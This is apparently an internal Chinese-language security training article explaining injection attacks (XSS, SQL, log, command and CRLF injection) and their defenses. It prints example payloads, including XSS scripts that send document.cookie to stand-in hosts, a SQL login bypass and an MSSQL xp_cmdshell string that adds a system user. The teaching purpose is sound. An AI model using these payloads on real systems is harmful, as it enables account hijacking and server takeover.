注入攻击

对于所有的网络安全问题，从公司的发文来看，结合目前业界发现的所有对网站的攻击方式，基本都可以归类于这三类：

1、防注入；

2、防破解；

3、防范洪；

第一类、注入攻击是最常见的一种攻击，涉及的方式也有很多，例如比较常见的有，脚本注入，sql注入，日志注入，xss等。

第二类、对于破解这一块，主要是加解密，秘钥存储等安全，防破解，防秘钥盗用，

第三类、范洪攻击，也就是ddos攻击，各细分种类也很多，例如cc攻击，资源耗尽攻击等等，

这三大类常见的网络安全问题我将用三期结合公司的安全红线来进行分享，这一期就将第一类常见的网络攻击，注入攻击，常见的注入攻击有以下几类：

• xss
• sql注入
• 日志注入
• 命令注入
• CRLF注入

一、xss

1、本质

xss叫跨站脚本攻击，为什么这里会分到注入这一模块呢，因为xss本质就是html注入，用户通过输入一些恶意的脚本代码，然后该用户输入的代码被网站当做html代码来执行，混淆了原来的语义，产生新的语义，从而导致了危害的发生。

2、危害

• 窃取用户信息，模拟用户身份执行操作，获取用户的 Cookie，获取敏感数据
• 植入flash，通过corssdomain权限设置进一步获取更高权限，
• 利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻击者）用户的身份执行一些管理动作，或执行一些例如发微博，加好友发私信等常规操作
• 利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的
  投票活动。
• 在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDoS攻击的效果

3、类型

1、存储型

恶意脚本被存储在服务器端，当用户访问该网站时，该代码就会被执行

2、反射性

反射型只是简单的把用户的输入反馈给浏览器，让浏览器执行用户的输入，当然这个用户可能输入一些恶意代码，或者被黑客诱导输入恶意代码

**例如：**将恶意脚本代码加入URL地址的请求参数里，请求参数进入程序后在页面直接输出，用户点击恶意链接就可能受到攻击。

3、DOM型

将脚本代码加入URL地址的请求参数里，通过修改页面的DOM节点来形成XSS，其实和反射型XSS是同一类

4、原理

例如有一个论坛网站，攻击者可以在上面发布以下内容：

<script>location.href="//domain.com/?c=" + document.cookie</script>

之后该内容可能会被渲染成以下形式：

<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>

另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态，那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。

存储型XSS

Web应用未对用户提交请求的数据做充分的检查过滤，允许用户在提交的数据中掺入HTML代码（最主要的是“<”、">"）然后存储到数据库中，当其他人在访问该网站，访问该数据时，例如上个用户提交了携带HTML代码的评论，其他人在访问该评论时，网站将未经转义的恶意代码输出到第三方用户的浏览器解释执行，这就可能导致了XSS攻击。

反射型XSS

举个例子:

接下来以反射性XSS举例说明XSS的过程：现在有一个网站，根据参数输出用户的名称，例如访问url：
http://127.0.0.1/?name=astaxie，就会在浏览器输出如下信息：
hello astaxie
如果我们传递这样的url：http://127.0.0.1/?name=<script>alert(‘astaxie,xss’)</script>,
这时你就会发现浏览器跳出一个弹出框，这说明站点已经存在了XSS漏洞。那么恶意用户是如何盗取Cookie的呢？与上类似，如下这样的url：
http://127.0.0.1/name=<script>document.location.href=‘http://www.xxx.com/cookie?’+document.cookie</script>，这样就可以把当前的cookie发送到指定的站点：www.xxx.com。你也许会说，这样的URL一看就有问题，怎么会有人点击？，是的，这类的URL会让人怀疑，但如果使用短网址服务将之缩短，你还看得出来么？，攻击者将缩短过后的url通过某些途径传播开来，不明真相的用户一旦点击了这样的url，相应cookie数据就会被发送事先设定好的站点，这样子就盗得了用户的cookie信息，然后就可以利用Websleuth之类的工具来检查是否能盗取那个用户的账户。

DOM型XSS

通过修改页面的DOM节点形成XSS，称之为DOM Based XSS。

5、防范手段

xss防范手段有很多，但对于所有注入攻击的最底线的防范手段就是输入校验，坚决不要相信用户的任何输入，并过滤掉输入中的所有特殊字符。这样就能消灭绝大部分的XSS攻击。

1. 设置 Cookie 为 HttpOnly

设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用，就无法通过 document.cookie 获取用户 Cookie 信息。这个属性是设置是否可通过客户端脚本访问这个设置的cookie，第一这个可以防止这个cookie被XSS读取从而引起session劫持，第二cookie设置不会像URL重置方式那么容易获取sessionID。这样cookie只能被本地浏览器在每次访问时携带，不能被任何js脚本读取进行使用。

2. 过滤特殊字符

例如将 < 转义为 <，将 > 转义为 >，从而避免 HTML 和 Jascript 代码的运行。

富文本编辑器允许用户输入 HTML 代码，就不能简单地将 < 等字符进行过滤了，极大地提高了 XSS 攻击的可能性。

富文本编辑器通常采用 XSS filter 来防范 XSS 攻击，通过定义一些标签白名单或者黑名单，从而不允许有攻击性的 HTML 代码的输入。

以下例子中，form 和 script 等标签都被转义，而 h 和 p 等标签将会保留。

<h1 id="title">XSS Demo</h1><p>123</p><form><input type="text" name="q" value="test">
</form><pre>hello</pre><script type="text/javascript">
alert(/xss/);
</script>
------------------------转义---------------------------
<h1>XSS Demo</h1><p>123</p>&lt;form&gt;&lt;input type="text" name="q" value="test"&gt;
&lt;/form&gt;<pre>hello</pre>&lt;script type="text/javascript"&gt;
alert(/xss/);
&lt;/script&gt;

3. 使用HTTP头指定类型

w.Header().Set(“Content-Type”,“text/javascript”)
这样就可以让浏览器解析javascript代码，而不会是html输出。

XSS 过滤在线测试](http://jsxss.com/zh/try.html)

小结

诸如 XSS其实就是js注入，还有sql注入等这些漏洞，都是攻击者构造一些特殊字符，使得产生漏洞被利用，因此对特殊符号的检查就很必要。输入检查的逻辑必须放在服务器端代码中实现，如果只是在前端用js代码对输入进行检查，很容易被攻击者绕过。最常见的做法是在前端和后端都做检查，发现特殊字符就进行过滤或者编码。

注：

​ 对于XSS攻击有很多类，比如cookie劫持、修改DOM节点、识别用户浏览器、甚至用户电脑安装的软件、获取用户真实IP地址、构建GET,POST请求，利用用户的身份做些恶意操作等。但这个前提都是网站有XSS漏洞，黑客发现这个漏洞，通过js注入，使得合法用户在浏览器上运行了这段代码，也就是说要杜绝XSS攻击，就要保证自己的网站没有XSS漏洞，没有js注入的可能性。

二、sql注入

1、概念

sql注入攻击，简称注入攻击，是web常见的一种安全漏洞。可以用它来从数据库中获取敏感信息，或利用数据库添加用户，导出文件等一系类的恶意操作。

主要是因为代码和数据混合，数据直接嵌入到代码中，因为数据往往是用户输入。

2、攻击原理

造成sql注入的原因是因为程序没有有效过滤用户的输入，使攻击者成功的向服务器提交恶意的SQL查询代码，程序在接收后错误的将攻击者的输入作为查询语句的一部分执行，导致原始的查询逻辑被改变，额外的执行了攻击者精心构造的恶意代码。服务器上的数据库运行非法的 SQL 语句，主要通过拼接来完成。

举个例子：

考虑以下简单的登录表单：

代码为：

<form action="/login" method="POST">
<p>Username: <input type="text" name="username" /></p>
<p>Password: <input type="password" name="password" /></p>
<p><input

在页面的表示效果：

Username:

Password:

我们在后台的处理里面的SQL可能是这样的：

username:=r.Form.Get("username")
password:=r.Form.Get("password")
sql:="SELECT * FROM user WHERE username='"+username+"' AND password='"+password+""

如果果用户在上面页面的输入框的输入的用户名如下，密码任意

myuser' or 'foo' == 'foo' --
那么我们的SQL变成了如下所示：

SELECT * FROM user WHERE username='myuser' or 'foo'=='foo' --'' AND password='xxx'

在SQL里面–是注释标记，所以查询语句会在此中断。这就让攻击者在不知道任何合法用户名和密码的情况下成功登录了。

对于MSSQL还有更加危险的一种SQL注入，就是控制系统，下面这个可怕的例子将演示如何在某些版本的MSSQL数据库上执行系统命令。

sql:="SELECT * FROM products WHERE name LIKE '%"+prod+"%'"
Db.Exec(sql)
如果攻击提交a%' exec master..xp_cmdshell 'net user test testpass /ADD' --作为变量prod的
值，那么sql将会变成
sql:="SELECT * FROM products WHERE name LIKE '%a%' exec master..xp_cmdshell 'net user test testpassMSSQL服务器会执行这条SQL语句，包括它后面那个用于向系统添加新用户的命令。如果这个程序是以sa运行而
MSSQLSERVER服务又有足够的权限的话，攻击者就可以获得一个系统帐号来访问主机了。
虽然以上的例子是针对某一特定的数据库系统的，但是这并不代表不能对其它数据库系统实施类似的攻击。针对这
种安全漏洞，只要使用不同方法，各种数据库都有可能遭殃。

3、危害

• 获取服务器权限
• 植入webshell，获取服务器后门
• 读取服务器敏感文件
• 万能密码

4、防范手段

永远不要信任外界输入的数据，特别是来自于用户的数据，包括选择框、表单隐藏域和 cookie。

1. 严格限制Web应用的数据库的操作权限，给此用户提供仅仅能够满足其工作的最低权限，从而最大限度的减少
   注入攻击对数据库的危害。
2. 检查输入的数据是否具有所期望的数据格式，严格限制变量的类型，例如使用regexp包进行一些匹配处理，
   或者使用strconv包对字符串转化成其他基本类型的数据进行判断。
3. 对进入数据库的特殊字符（’"\尖括号&*;等）进行转义处理，或编码转换。Go 的text/template包里面的
   HTMLEscapeString函数可以对字符串进行转义处理。
4. 所有的查询语句建议使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入
   到SQL语句中，即不要直接拼接SQL语句。例如使用database/sql里面的查询函数Prepare和Query，或者
   Exec(query string, args …interface{})。
5. 在应用发布之前建议使用专业的SQL注入检测工具进行检测，以及时修补被发现的SQL注入漏洞。网上有很多
   这方面的开源工具，例如sqlmap、SQLninja等。
6. 避免网站打印出SQL错误信息，比如类型错误、字段不匹配等，把代码里的SQL语句暴露出来，以防止攻击者
   利用这些错误信息进行SQL注入。

三、日志注入

1、 概念

日志注入是用户通过输入一些恶意的数据，然后该输入正好需要被记录到日志中，导致日志格式，信息被破坏

2、危害

在软件开发，特别是网站类的系统开发时，往往需要记录一些日志来做数据分析，问题定和追踪，但如果日志被篡改或者被恶意写入，则给基于日志信息的问题定位，问题排除，用户行为分析等工作带来非常大的干扰，甚至错误的问题导向，危害极大，因此保证日志的安全也是极为重要。

3、常见日志注入

New Line Injection

新行注入，这种方法是最普遍的Log注入方法，用户的输入被记录到日志，而该输入又没有做校验，因此用户可以通过在输入时加上换行符并伪造一个新的记录，该输入在被记录到日志文件后，很容易被当做正常的日志处理，而出现日志伪造，不实信息。

来看下面几行代码

func main() {writeToLog("张三")
}func writeToLog(userName string){Error.Println("Failed logon for user ", userName)
}

上面的代码似乎没有什么问题，正常情况下，当用户张三登陆系统失败时，将记录日志如下：

Error: log.go:34: Failed logon for user  张三

假如张三不怀好意，在用户名一栏里输入了如下的字符：

张三\nError: log.go:56: Failed to delete all files for 李四\nError: log.go:56: Failed to remove user 李四 for 李四

日志将会这样记录：

Error: log.go:34: Failed logon for user  张三
Error: log.go:56: Failed to delete all files for 李四
Error: log.go:56: Failed to remove user 李四 for 李四

当管理员看到上面的日志时肯定会想：李四这家伙，想删掉所有文件，然后再销毁证据。当然这里我们可以根据代码的函数数字判断可能是伪造的，但假如管理员没注意到这个，或者行数就被用户猜对了呢，这危害还是蛮大的。

Sparator Injection

有些人写日志喜欢用一些分隔符来分隔不同的字段，比如用分隔符：|，或者是使用Tab作为分隔符。比如下面的日志：

| Customer     | Number     | Operation     |
| 张三          | 100        | 取钱          |
| 李四          | 800        | 存钱          |

当张三输入的内容为：

10000    | 存钱    |

则日志的结果为：

| Customer     | Number     | Operation     |
| 张三          | 1000       | 存钱           | 取钱    |
| 李四          | 800        | 存钱           |

上面张三的记录中多出来了一列，很容易被管理员发现。但是假如我们的日志系统是由程序自动来读取的话，张三很有可能被认为存入了1000大钞。

Timestamp Injection

时间戳注入，一般我们都会记录每个步骤执行的时间

Abusing Word Wrap

当换行注入被拒绝的时候，还有一种投机的办法，就是不主动换行，使用一些空格或其他符号，导致文字自动换行。这很容易理解，当然，要真正实施起来并且完美无缺确实是很困难的。比如下面被注入的日志：

Failed logon for user 张三 __________________（自动换行）
Failed to delete all files for 李四_____________（自动换行）
Failed to remove user 李四 for 李四

这样的做法可能会觉得很可笑，但确实会很容易迷惑管理员的眼睛。那，有什么办法呢？

1. 假如是在Windows平台下，使用编辑器打开的话，记得关闭自动换行功能。
2. 假如在Linux下面呢，在终端显示内容的话，对日志内容进行处理，加上一些自动换行的分隔符号，比如：[CR]。（这样做的话其实也不好，假如用户输入的数据原本就包含了[CR]字符，将很难区分用户输入的数据和分隔符号。对于这个问题，大家支点招吧！）

HTML Injection

有时我们需要将日志中的内容展示在一个网页上，比如我们的监控页面，就是提取日志内容，然后进行分析处理再以一个网页的形式可视化的展示，而操作不当会让黑客通过网页的一些攻击来影响到日志的内容

<table>
<tr><td>Failed logon for user</td></tr>
<tr><td>Failed to delete all files for 李四</td></tr>< /table><script>alert('hacked!');</script><!--</td></tr>
<tr><td></td></tr>
</table>

4、防范手段

永远不要信任外界输入的数据，特别是来自于用户的数据，对于所有需要记入日志的外界输入一律都需要做校验，如果是前后端分离的网站，前后端都需要做校验，过滤特殊字符。

四、命令注入

1、概念

利用可以调用系统命令的web应用，通过构造特殊命令字符串的方式，把恶意代码输入一个编辑域(例如缺乏有效验证的输入框)来改变网页动态生成的内容，最终实现本应在服务端才能工作的系统命令。

2、危害

一个恶意黑客可以利用这种攻击方法来非法获取数据或者网络资源。

一旦存在命令注入漏洞，攻击者就可以在目标系统执行任意命令，这通常意味着服务器被拱手让人。

3、命令注入过程：

1、web应用程序要调用系统命令的函数

2、函数或函数参数可控，是通过前端传入的

3、然后应用程序通过前端拿到参数进行拼接命令，并执行该命令

4、防范手段

• 不使用时禁用相应函数
• 尽量不要执行外部的应用程序或命令
• 做输入的格式检查
• 转义命令中的所有shell元字符

五、CRLF注入

CRLF实际是两个字符，CR是\r，LF是\n。\r\n这两个字符用于表示换行，其中十六进制分别是0x0d、0x0a。注入CRLF会改变原来的语义这常和日志注入联系在一起，对于CRLF注入比较好处理，只要处理好\n、\r这两个字符就好了。

总结

注入攻击有很多类，除了上面描述的几类，还有注入xml注入，代码注入等，网站风险也多种多样，叫法也丰富多彩，比如什么钓鱼啊，webshell植入啊,网页篡改啊，暗链啊等等，虽然种类繁多，这也没法一一例举，但本质其实都是通过注入攻击实现的，如果一个网站没有被注入的漏洞，这个网站可以说基本就算是比较安全的了，其实大多数黑客都是在尝试找网站的漏洞，通过注入一些恶意代码，网站误执行了这些代码，导致网站大门向别人敞开，就类型与黑客通过各种手段，向网站植入了一个内奸，然后和内奸里应外合，逐步夺取大权。

对于所有的注入攻击，就像上面所有防范手段中都提到的一点，不能相信用户的任何输入，对任何有外界输入的数据都需要做校验，或者就将其打入冷宫，在源头上解决问题，在黑客植入内奸的时候就对内奸进行全面的扫描，只要符合自己规范的字符。而不能模糊匹配。